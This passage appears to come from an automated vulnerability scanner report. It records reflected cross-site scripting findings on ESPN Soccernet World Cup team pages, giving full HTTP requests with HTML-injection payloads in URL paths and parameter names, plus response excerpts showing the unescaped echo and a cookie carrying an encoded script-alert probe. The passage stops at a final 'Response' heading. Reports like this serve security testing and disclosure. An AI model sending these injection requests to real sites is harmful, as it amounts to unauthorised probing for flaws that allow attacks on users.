Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/482/portugal
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9668"><a>dbe5bd058c5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/482/portugal?c9668"><a>dbe5bd058c5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:26 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:26 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN16 Cache-Expires: Sat, 06 Nov 2010 23:28:26 GMT Content-Length: 81713 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Portugal Football / ...[SNIP]... <a href="/worldcup2010/team?team=482&c9668"><a>dbe5bd058c5=1&_slug_=portugal&c9668"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94792"><a>24dd3ae9355 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea94792"><a>24dd3ae9355 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:28:05 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:28:05 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN10 Cache-Expires: Sat, 06 Nov 2010 23:33:05 GMT Content-Length: 81813 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&_slug_=north-korea94792"><a>24dd3ae9355&topId=803573&linktext=North+Korea+coach+proud+of+players"> ...[SNIP]...
5.103. http://soccernet.espn.go.com/worldcup2010/team/_/team/4860/north-korea [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/4860/north-korea
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85746"><a>c9e9c662c34 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/4860/north-korea?85746"><a>c9e9c662c34=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:23:57 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:23:57 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN07 Cache-Expires: Sat, 06 Nov 2010 23:28:57 GMT Content-Length: 81921 Connection: close Via: 8810-09/10 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>North Korea Footbal ...[SNIP]... <a href="/worldcup2010/team?team=4860&85746"><a>c9e9c662c34=1&_slug_=north-korea&85746"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ced83"><a>be36cbbeb72 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeriaced83"><a>be36cbbeb72 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:08:10 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:08:10 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN02 Cache-Expires: Sat, 06 Nov 2010 23:13:10 GMT Content-Length: 81717 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&_slug_=algeriaced83"><a>be36cbbeb72&topId=795940&linktext=Saifi+accused+of+slapping+journalist"> ...[SNIP]...
5.105. http://soccernet.espn.go.com/worldcup2010/team/_/team/624/algeria [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/624/algeria
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9d7f4"><a>1a4281499ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/624/algeria?9d7f4"><a>1a4281499ae=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:07:07 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:07:07 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN11 Cache-Expires: Sat, 06 Nov 2010 23:12:07 GMT Content-Length: 81825 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Algeria Football / ...[SNIP]... <a href="/worldcup2010/team?team=624&9d7f4"><a>1a4281499ae=1&_slug_=algeria&9d7f4"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f74e2"><a>61cba004527 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japanf74e2"><a>61cba004527 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:19:24 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:19:24 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN01 Cache-Expires: Sat, 06 Nov 2010 23:24:24 GMT Content-Length: 81475 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&_slug_=japanf74e2"><a>61cba004527&topId=804089&linktext=Japan+search+for+new+boss"> ...[SNIP]...
5.107. http://soccernet.espn.go.com/worldcup2010/team/_/team/627/japan [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://soccernet.espn.go.com
Path:
/worldcup2010/team/_/team/627/japan
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7f5b1"><a>ddd77a815e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/627/japan?7f5b1"><a>ddd77a815e5=1 HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
HTTP/1.1 200 OK Cache-Control: max-age=300 Date: Sat, 06 Nov 2010 23:15:11 GMT Content-Type: text/html; charset=iso-8859-1 Last-Modified: Sat, 06 Nov 2010 23:15:11 GMT Server: Microsoft-IIS/6.0 P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE" From: ESPN31 Cache-Expires: Sat, 06 Nov 2010 23:20:11 GMT Content-Length: 81583 Connection: close Via: 8810-07/08 X-UA-Compatible: IE=EmulateIE7 Vary: Accept-Encoding
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Japan Football / So ...[SNIP]... <a href="/worldcup2010/team?team=627&7f5b1"><a>ddd77a815e5=1&_slug_=japan&7f5b1"> ...[SNIP]...
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91c26"><a>970c5e66c8e was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /worldcup2010/team/_/team/628/australia91c26"><a>970c5e66c8e HTTP/1.1 Host: soccernet.espn.go.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TSC=1; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221289019231707_594159%22%2C%22ru%22%3A%22http%3A%2F%2Finsider.espn.go.com%2Finsider%2Frumorcentral%3F39322%2522%253E%253Cscript%253Ealert(1)%253C%2Fscript%253E526b434719f%3D%22%2C%22r%22%3A%22insider.espn.go.com%22%2C%22st%22%3A%22%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fsoccernet.espn.go.com%2Fworldcup%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Afalse%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22f%22%3A1289019278268%7D; jt_time=1289020630363; s_sess=%20s_ppv%3D83%3B%20s_cc%3Dtrue%3B%20s_omni_lid%3D%3B%20s_sq%3D%3B; fsr.a=1289020662234; CRBLM_LAST_UPDATE=1289020821; lang=en; userAB=7; soccerNetIndex=true; mbox=session#1289020509579-435223#1289022520|check#true#1289020720; broadbandAccess=espn3-false%2Cnetworks-false; DE2=dXNhO3R4O2hvdXN0b247YnJvYWRiYW5kOzU7NDszOzYxODswMjkuNzYzOy0wOTUuMzYzOzg0MDs0NDsxODs2O3VzOw==; s_pers=%20s_c24%3D1289020630042%7C1383628630042%3B%20s_c24_s%3DFirst%2520Visit%7C1289022430042%3B%20s_gpv_pn%3Dsoccernet%253Aworldcup2010%253Aindex%7C1289022430076%3B; espn360=false; RegTrackX=/insider/news/rumor central - mlb|local|not specified|not specified; DS=dGhlcGxhbmV0LmNvbTs3MzczMDQ7dGhlcGxhbmV0LmNvbSBpbnRlcm5ldCBzZXJ2aWNlcyBpbmMuOw==; s_vi=[CS]v1|266A6FBD05013105-60000110E0002F8F[CE]; worldcupversion=us; CP=null*; CRBLM=CBLM-001:; AcceptCookies=yes; COREG=5901; SWID=53406FAA-0429-45ED-9ACF-3C114582784B; SEEN2=cAMLBtEO:;
Response
